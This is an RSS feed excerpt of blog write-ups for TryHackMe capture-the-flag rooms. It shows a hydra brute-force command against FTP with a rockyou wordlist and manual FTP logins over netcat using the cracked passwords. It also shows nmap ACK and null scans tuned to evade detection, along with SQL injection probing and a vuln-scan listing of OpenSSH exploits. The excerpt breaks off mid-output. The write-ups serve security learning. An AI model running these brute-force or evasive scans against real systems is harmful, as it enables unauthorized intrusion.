&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;hydra&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -f&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -s&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10021&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -l&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; quinn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -P&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; ~/.local/share/red-team/wordlists/rockyou.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;         10.10.152.115&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; ftp&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;These quickly return the results eddie:jordan and quinn:andrea. Let’s try to use &lt;code&gt;nc -nv 10.10.152.115 10021&lt;/code&gt; to &lt;a href=&quot;https://www.serv-u.com/resource/tutorial/quit-user-abor-acct-syst-xdel-ftp-command&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;log into&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; eddie’s account.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;ftp&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;ftp&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;(UNKNOWN) [10.10.152.115] 10021 (?) open&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;220 (vsFTPd 3.0.3)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;USER eddie&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;331 Please specify the password.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PASS jordan&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;230 Login successful.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;425 Use PORT or PASV first.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PASV&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;227 Entering Passive Mode (10,10,152,115,119,101).&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;LIST&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;150 Here comes the directory listing.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;226 Directory send OK.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;QUIT&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;221 Goodbye.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;The trick here is that the FTP passive mode response returns (o1,o2,o3,o4,p1,p2), where o1 - o4 are the four octets of the server’s IP address (10.10.152.115), and p1 - p2 are the high + low bytes of the port number to connect to, (256 x p1) + p2. Thus, &lt;a href=&quot;https://stackoverflow.com/questions/50324402/how-to-list-ftp-directories-using-telnet#comment126707507_50324402&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;after entering passive mode we can catch the reply using a second netcat instance&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, &lt;code&gt;nc -nv 10.10.152.115 30565&lt;/code&gt;. We start this &lt;em&gt;before&lt;/em&gt; entering the &lt;a href=&quot;https://www.serv-u.com/resource/tutorial/appe-stor-stou-retr-list-mlsd-mlst-ftp-command&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;LIST&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; command, revealing that eddie has access to no files.&lt;/p&gt;
&lt;p&gt;Let’s have the same conversation for quinn.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;ftp&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;ftp&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;(UNKNOWN) [10.10.152.115] 10021 (?) open&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;220 (vsFTPd 3.0.3)&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;USER quinn&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;331 Please specify the password.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PASS andrea&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;230 Login successful.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PASV&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;227 Entering Passive Mode (10,10,152,115,120,34).&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;LIST&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;150 Here comes the directory listing.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;226 Directory send OK.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;PASV&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;227 Entering Passive Mode (10,10,152,115,117,85).&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;RETR ftp_flag.txt&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;150 Opening BINARY mode data connection for ftp_flag.txt (18 bytes).&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;226 Transfer complete.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;QUIT&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;221 Goodbye.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;For FTP active mode we need to open &lt;em&gt;two&lt;/em&gt; auxiliary netcat sessions. The first, &lt;code&gt;nc -nv 10.10.152.115 30754&lt;/code&gt;, catches the LIST command, which reveals that quinn has access to an &lt;code&gt;ftp_flag.txt&lt;/code&gt; file. The second, &lt;code&gt;nc -nv 10.10.152.115 30037&lt;/code&gt;, catches the contents of that file after issuing the RETR command. This is the answer to our penultimate challenge.&lt;/p&gt;
&lt;p&gt;For the final challenge, we go to &lt;code&gt;http://10.10.152.115:8080&lt;/code&gt;. The challenge is to scan 10.10.152.115 “as covertly as possible”. I’m not really willing to wait 7 months for a scan, but I’ll bet that all we need to do is use &lt;code&gt;-T1&lt;/code&gt; and drop &lt;code&gt;-A&lt;/code&gt;.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -n&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T1&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.152.115&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Well, that didn’t work - “71% chance of scan being detected” and we’re nowhere near done. That, and the machine expired without me even noticing.&lt;/p&gt;
&lt;p&gt;New target IP is 10.10.34.244.&lt;/p&gt;
&lt;p&gt;Maybe speed doesn’t matter here? Let’s try a scan that shouldn’t even look like a connection - an ACK scan - but at a more “normal” rate.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -n&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sA&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.34.244&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Well, that resulted in an almost immediate flag. Switching to &lt;code&gt;-T2&lt;/code&gt; for the timing here also incremented things quite quickly.&lt;/p&gt;
&lt;p&gt;What about a null scan? That might actually get me more information than an ACK scan, but should elicit &lt;em&gt;any&lt;/em&gt; response from open ports.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -n&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sN&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.34.244&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;“Null scan” is apparently the right answer, as the challenge provided the flag almost immediately (which doesn’t &lt;em&gt;actually&lt;/em&gt; make any sense, but whatever…).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 2 h 31 min&lt;/p&gt; ]]></description>
    <pubDate>Sun, 03 Apr 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Jurassic Park</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2022-02-02</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2022-02-02</guid>
    <description><![CDATA[ &lt;h1 id=&quot;jurassic-park&quot;&gt;Jurassic Park&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#jurassic-park&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/jurassicpark&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Jurassic Park” on TryHackMe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Our target is 10.10.105.134.&lt;/p&gt;
&lt;p&gt;This is a &lt;em&gt;very&lt;/em&gt; simple site: An index page (index.php) that leads to a shop.php page, which in turn links to three calls of &lt;code&gt;item.php?id=X&lt;/code&gt; (where &lt;code&gt;X&lt;/code&gt; is a number).&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Trying to include /etc/os-release via item.php causes the site to display a Dennis Nedry page that taunts you to use &lt;a href=&quot;https://sqlmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;SQLMap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;. Trying a hand-crafted test SQL injection also displays this page.&lt;/li&gt;
&lt;li&gt;Trying different random indexes mostly doesn’t work, though &lt;code&gt;item.php?id=100&lt;/code&gt; displays a curiously broken page.&lt;/li&gt;
&lt;li&gt;Trying &lt;code&gt;item.php?id=..&lt;/code&gt; throws an SQL error revealing that the site is running on MySQL.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s see if our usual &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; scan turns up anything interesting:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oA&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; jurassic-park&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sS&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;          -script&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; vuln&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.105.134&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This gives the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.92 scan initiated Wed Feb  2 20:28:37 2022 as: nmap -v -oA jurassic-park -Pn -A -T4 -sS -script vuln -p- 10.10.105.134
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 10.10.105.134
Host is up (0.17s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.2p2:
|     	PACKETSTORM:140070	7.8	https://vulners.com/packetstorm/PACKETSTORM:140070	*EXPLOIT*
|     	EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	7.8	https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	*EXPLOIT*
|     	EDB-ID:40888	7.8	https://vulners.com/exploitdb/EDB-ID:40888	*EXPLOIT*
|     	CVE-2016-8858	7.8	https://vulners.com/cve/CVE-2016-8858
|     	CVE-2016-6515	7.8	https://vulners.com/cve/CVE-2016-6515
|     	1337DAY-ID-26494	7.8	https://vulners.com/zdt/1337DAY-ID-26494	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	CVE-2016-10009	7.5	https://vulners.com/cve/CVE-2016-10009
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	SSV:92582	7.2	https://vulners.com/seebug/SSV:92582	*EXPLOIT*
|     	CVE-2016-10012	7.2	https://vulners.com/cve/CVE-2016-10012
|     	CVE-2015-8325	7.2	https://vulners.com/cve/CVE-2015-8325
|     	SSV:92580	6.9	https://vulners.com/seebug/SSV:92580	*EXPLOIT*
|     	CVE-2016-10010	6.9	https://vulners.com/cve/CVE-2016-10010
|     	1337DAY-ID-26577	6.9	https://vulners.com/zdt/1337DAY-ID-26577	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-25017/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/IBM-AIX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	*EXPLOIT*
